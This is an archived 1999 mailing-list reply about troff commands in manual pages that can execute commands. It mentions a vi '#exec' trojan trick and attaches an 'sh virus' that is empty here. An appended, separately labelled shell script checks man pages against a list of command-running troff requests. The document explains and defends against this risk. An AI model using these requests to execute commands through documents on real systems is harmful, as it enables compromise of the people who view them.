Re: Troff dangerous.

From: Pete (shipleyat_private)
Date: Sun Jul 25 1999 - 17:59:23 PDT


    ------- =_aaaaaaaaaa0
    Content-Type: text/plain; charset="us-ascii"
    Content-ID: <28766.932950763.1at_private>
    
    >On Fri, Jul 23, 1999 at 10:16:42PM +0200, Pawel Wilk wrote:
    >>
    >> If you want your system safe,
    >> don't look as root
    >> at manual page.
    >
    >Don't look at them _at_all_ before checking them for dangerous troff-commands
    >I'd say. In the end of my message I have included the shell function I use to
    >check manual pages before installing them / viewing them.
    >
    >What this also means is SGID man is probably not a good idea (a method that is
    >used to avoid having the preformatted manual page cache, catman, directories
    >world-writable).
    
    <RANT>
        This is not a *new* security problem, this has been known for
        decades and ranks with trojans in VI and TeX and sh shell (I will
        attach a sh shell virus).
    
        I believe it was Spafford that published a worm or virus written in TeX
        but I can't locate it in my security archives at the moment.   I am sure
        someone on this list has a copy.
    
        Also in VI it is/was (depending on your system and which version of VI you
        have installed) possible to have arbitrary commands executed as the file
        was edited.
    
    
        I believe the syntax was
    
    	#exec  <command>
    
        and it had to be one of the first five lines in the file
    
    
    
        Thus you would update your warning  to be:
    
    	when root don't edit files, read man pages or print TeX documents
    	or run commands.
    
        Also don't forget to have set messages to off so people can't bounce
        commands off your terminal's status line (aka: the "25th" line)
    
    
    </RANT>
    
    But as for your statement, I would prefer a setuid/gid man (to a dedicated
    uid and gid), thus *when* your troff is compromised, it will not have the
    authority to compromise your system.
    
    
    
    
    
    
    
    ------- =_aaaaaaaaaa0
    Content-Type: plain/text
    Content-ID: <28766.932950763.2at_private>
    Content-Description: sh virus
    Content-Transfer-Encoding: base64
    
    
    ------- =_aaaaaaaaaa0--
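
As an added example, not part of the original post and not the shell function the quoted message refers to: one way to check a manual page for troff requests before viewing or installing it. The request list (`sy`, `pso`, `pi`, `open`, `opena`) is an assumption taken from the requests groff disables in its safer mode, and `scan_troff` and `check_manpage` are hypothetical names.

```shell
#!/bin/sh
# Added example, not the function from the thread.
# Assumption: the request names are the ones groff's safer mode (-S) disables.
UNSAFE='sy|pso|pi|open|opena'
# A request line starts with the control character "." or "'", then optional
# blanks, then the request name.
DIRECT="^[.'][[:space:]]*(${UNSAFE})([[:space:]]|\$)"
# Requests that can hide one of the above: changing the control characters
# (cc, c2) or aliasing/renaming a request (als, rn). Flag these for review.
HIDING="^[.'][[:space:]]*(cc|c2|als|rn)([[:space:]]|\$)"

# scan_troff: read troff source on stdin, print flagged lines as N:text.
# Returns 0 when nothing is flagged, 1 when at least one line is.
scan_troff() {
    if grep -nE -e "$DIRECT" -e "$HIDING"; then
        return 1
    fi
    return 0
}

# check_manpage FILE: scan a plain or gzip-compressed page.
# Returns 2 when the file cannot be read.
check_manpage() {
    [ -r "$1" ] || { echo "cannot read: $1" >&2; return 2; }
    case $1 in
        *.gz) gzip -dc -- "$1" | scan_troff ;;
        *)    scan_troff < "$1" ;;
    esac
}

# Constructed sample page: line 4 is the kind of request the scan reports.
printf '%s\n' '.TH DEMO 1' '.SH NAME' 'demo \- constructed sample' \
    '.sy echo constructed-sample' |
    scan_troff || echo 'sample page flagged, do not format it'
```

The scan is a heuristic pre-check; keeping groff in its default safer mode (that is, not passing `-U`) remains the primary control.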
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:53:33 PDT